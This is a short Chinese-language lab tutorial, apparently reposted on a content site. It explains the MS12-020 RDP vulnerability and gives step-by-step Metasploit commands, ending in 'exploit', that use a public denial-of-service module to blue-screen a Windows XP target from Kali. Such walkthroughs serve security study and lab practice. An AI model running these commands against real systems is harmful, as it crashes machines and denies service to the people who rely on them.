一、漏洞介绍
又名:死亡蓝屏。这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.Windows xp 计算机一台。
3.整装待发的小白一个。
二、攻防实战
2.1 在kali中启动MSF。
打开终端 键入命令:msfconsole
2.2 配置相关参数
①键入命令:search ms12-020
②复制msf返回的命令前加use:use
auxiliary/dos/windows/rdp/ms12_020_maxchannellid
③显示需要配置的参数 :show options
⑤设置靶机(win xp)IP地址 set rhosts 192.168.xxx.xxx
⑥设置本机(kali) IP地址 set lhost 192.168.xxx.xxx
⑦运行payload键入命令:exploit
2.3 攻击成功靶机蓝屏
页面更新:2024-05-14
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号